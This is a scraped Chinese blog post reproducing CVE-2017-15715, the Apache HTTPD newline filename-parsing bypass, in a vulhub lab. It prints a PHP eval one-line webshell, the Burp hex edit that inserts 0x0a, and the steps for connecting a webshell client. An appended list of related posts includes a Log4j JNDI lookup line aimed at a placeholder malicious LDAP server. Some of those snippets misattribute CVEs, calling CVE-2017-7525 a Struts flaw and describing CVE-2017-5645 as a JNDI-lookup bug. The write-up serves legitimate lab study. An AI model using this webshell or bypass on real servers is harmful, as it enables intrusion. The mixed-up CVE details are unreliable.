Apache解析漏洞CVE-2017-15715

最新推荐文章于 2025-01-05 10:16:15 发布
最新推荐文章于 2025-01-05 10:16:15 发布
阅读量741 收藏 2
点赞数 2
CC 4.0 BY-SA版权
分类专栏: vulhub 文章标签: apache web安全 安全 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61702710/article/details/131748233
文章详细介绍了ApacheHTTPD2.4.0至2.4.29版本中的一个PHP解析漏洞,该漏洞允许通过在文件名中插入x0a来绕过服务器安全策略。利用此漏洞,攻击者可以上传包含一句话木马的文件,并通过在后缀中添加%0a进行连接,成功实现漏洞复现。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Apache HTTPD是一款 HTTP 服务器,它可以通过 mod_php 来运行 PHP 网页。其 2.4.0~2.4.29 版本中存在一个解析漏洞,在解析PHP 时, 1.php\x0a 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策略。
1、原理

apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略

2、影响版本

Apache HTTPd 2.4.0~2.4.29

3、复现环境

攻击机:本机(192.168.179.1/24),安装Burp Suite Professional,火狐浏览器,中国菜刀

靶机:linux(192.168.179.130/24),安装dockers,vulhub靶场

4、漏洞复现

1、在linux编译及运行漏洞环境

 docker-compose build
 docker-compose up -d
 docker-compose ps

image-20230716102317406

2、用火狐浏览器访问http://192.168.179.130:8080,很明显是文件上传漏洞

image-20230716102547870

3、上传文件,使用Burp Suite Professional 抓包

文件内容写入一句话木马

 <?php @eval($_POST['code']);?>

若直接上传则提示失败,考虑到应该是后台对php后缀的文件进行了过滤

4、切换到Hex,在01.php那行70与0d之间插入0a,然后发送,上传成功

5、用中国菜刀或蚁剑等工具进行连接,注意后缀加上%0a

image-20230716105809323

编辑完成后双击能看到目录,则说明漏洞利用成功,漏洞复现完成

 

CVE-2017-15715
天天学安全专属博客
07-18 1093
Apache HTTPD 换行解析漏洞CVE-2017-15715
11-4 Apache换行解析漏洞CVE-2017-15715
weixin_43263566的博客
11-25 1236
Apache換行解析漏洞CVE-2017-15715)是一种解析漏洞,可以影响httpd 2.4.0至2.4.29版本中的PHP解析。攻击者可以通过在上传的文件名中添加特定的换行符,绕过服务器的安全策略,使其被解析PHP文件而不是普通文件。未正确配置的服务器未对文件名进行适当验证的服务器使用正则表达式并启用Multiline属性的服务器攻击者可以将1.php\x0A作为文件名上传到服务器上,这个文件名看起来像是一个普通的非PHP文件,但是由于其中的特定字符,服务器会将其解析PHP文件。
Apache换行解析漏洞复现(CVE-2017-15715
weixin_57379923的博客
08-04 789
靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40。浏览器访问上传的文件在文件名后添加 %0a 进行访问。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
CVE-2017-15715~Apache解析漏洞【春秋云境靶场渗透】
weixin_67832625的博客
08-03 1120
Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如如下配置文件: AddType text/html .html AddLanguage zh-CN .cn
05 - vulhub - Apache HTTPD 换行解析漏洞CVE-2017-15715
易编橙 · 终身成长社群,相遇已是上上签!
10-14 729
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,`1.php\x0A`将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache HTTPD 换行解析漏洞CVE-2017-15715
weixin_45534587的博客
01-05 1563
如果是白名单可能不行(在白名单里面才可以上传jpj,png,gif 等),但是如果没有考虑以最后一个点为后缀,通过1.jpg.php%0a的形式也可能能够绕过。前三行的内容意思是将所有以“.php”为后缀的文件内容当作PHP代码进行解析,但是却使用了“$”进行文件匹配,这就导致了漏洞的产生。该漏洞属于用户配置不当所产生的,看一下配置文件信息,输入命令“cat /etc/apache2/conf-available/docker-php.conf”,如图所示。老版本可以通过hex修改,修改完,文件正常上传。
漏洞检测CVE-2017-7525---poc
01-20
### 漏洞检测CVE-2017-7525分析与PoC解析 #### 一、漏洞概述 CVE-2017-7525是Apache Struts框架中的一个远程代码执行漏洞。该漏洞允许攻击者通过精心构造的恶意请求来执行远程代码。Apache Struts是一款开源的MVC...
漏洞复现(Vulhub)-Apache HTTPD 换行解析漏洞CVE-2017-15715
qq_60848021的博客
09-20 1462
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
apache-CVE-2017-15715 漏洞复现
HEAVEN569的博客
02-14 1115
1.Apache HTTPD介绍 Apache HTTPD简称为httpd或者apache是一款HTTP服务器,是internet最广泛的web服务器之一。他可以通过mod_php来运行PHP网页。 2.漏洞原理 apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略 3.影响版本 2.4.0-2.4.29版本 4.漏洞复现 靶机:
Apache解析漏洞 CVE-2017-15715
m0_62284238的博客
09-10 360
进入vulnhub目录下的httpd目录,进入CVE-2017-15715目录。Apache禁止上传php文件,但是可以添加%0A换行符进行绕过。使用burpsuite抓包后改后缀为.php%0A。Apache是世界使用率排名第一的web服务器。上传成功后又会被Apache当作php文件解析。访问靶机的8080端口。出现如下即为开启成功!docker-compoe启动漏洞环境。直接上传.php文件会被拦截。上传一个后缀为phpa的文件。上传成功并且成功被解析
Apache换行解析漏洞CVE-2017-15715
qq_43665434的博客
05-10 812
Apache换行解析漏洞CVE-2017-15715 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击机(burp) 192.168.1.120 实验过程 启动centos8靶机,搭建漏洞环境: #开启docker service docker start #进入cve-2017-15715目录 cd /usr/sbin/vulhub/httpd/cve-2017-15715 #启动漏洞环境 docker-compose
Apache 解析漏洞(CVE-2017-15715)
weixin_46239998的博客
12-30 524
五、修改(在70和0d之间加入0a)七、用哥斯拉连接,getshell。
log4j2漏洞cve-2017
最新发布
03-21
### 关于Log4j2 CVE-2017-5645漏洞详情 Apache Log4j 是一款功能强大的 Java 日志框架,被广泛应用于企业级应用开发中。然而,在其早期版本中存在反序列化漏洞CVE-2017-5645),该漏洞允许攻击者通过精心构造的数据包触发远程代码执行 (RCE),从而完全控制受影响的应用程序。 此漏洞的根本原因在于 Log4j 的某些组件未能正确验证输入数据的安全性。当应用程序使用了不安全的配置或插件时,恶意用户可以利用这些缺陷注入可执行的有效载荷[^1]。 #### 影响范围 受到影响的主要为 Apache Log4j 版本 2.x 中的部分实现方式。具体来说,如果项目依赖了 `JMSAppender` 或其他涉及 JNDI 查询的功能模块,则可能暴露于此漏洞之下。值得注意的是,并非所有基于 Log4j 构建的服务都会直接受到威胁;只有那些启用了特定危险选项并连接至外部资源的情况下才会成为潜在目标。 #### 漏洞原理分析 在实际操作过程中,攻击者可以通过向服务器发送特制字符串来诱导后者解析含有恶意指令的内容。由于 Log4j 默认支持动态查找机制——即借助 `${}` 占位符语法完成变量替换工作——因此一旦遇到未加防护措施的情况便会轻易泄露系统权限给第三方人员掌控。 以下是简化版模拟场景下如何形成危害的一个例子: ```java // 假设日志记录器实例已创建好 logger.info("${jndi:ldap://malicious-server/exploit}"); ``` 上述代码片段展示了如何通过嵌套表达式调用 LDAP 接口获取额外信息的过程。假如服务端没有实施严格的白名单过滤策略或者关闭不必要的网络请求通道的话,那么就极有可能遭受此类入侵行为的影响。 #### 修复建议 为了防止进一步滥用该类问题的发生,官方推荐采取如下几种方法之一来进行补救: 1. **升级软件版本**: 将当前使用的 log4j 库更新至最新稳定发行版(>=2.8.2),因为后续迭代已经针对这一系列安全隐患进行了全面改进优化。 2. **禁用相关特性**: 如果无法立即迁移至新版本,则考虑临时移除或停用任何涉及到 JNDI 查找逻辑的相关设置项(`JMSAppender`, etc.)以减少暴露面. 3. **强化网络安全边界**: 配合防火墙规则限制不明来源地址访问内部敏感接口; 同时加强对传入流量内容的实时监控审计力度以便及时发现异常活动迹象. 4. **自定义模式匹配规则**: 开发团队还可以根据业务需求定制专属正则表达式用于筛查可疑字符组合出现频率较高的地方进而提前预警可能出现的风险状况. ```xml <!-- Example configuration snippet --> <Configuration status="WARN"> <Appenders> <!-- Remove or disable any appenders that use JNDI lookups --> </Appenders> </Configuration> ``` 以上 XML 文件摘录显示了一个简单的配置更改示例,其中删除或禁用了所有采用 JNDI 查找的操作部分。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值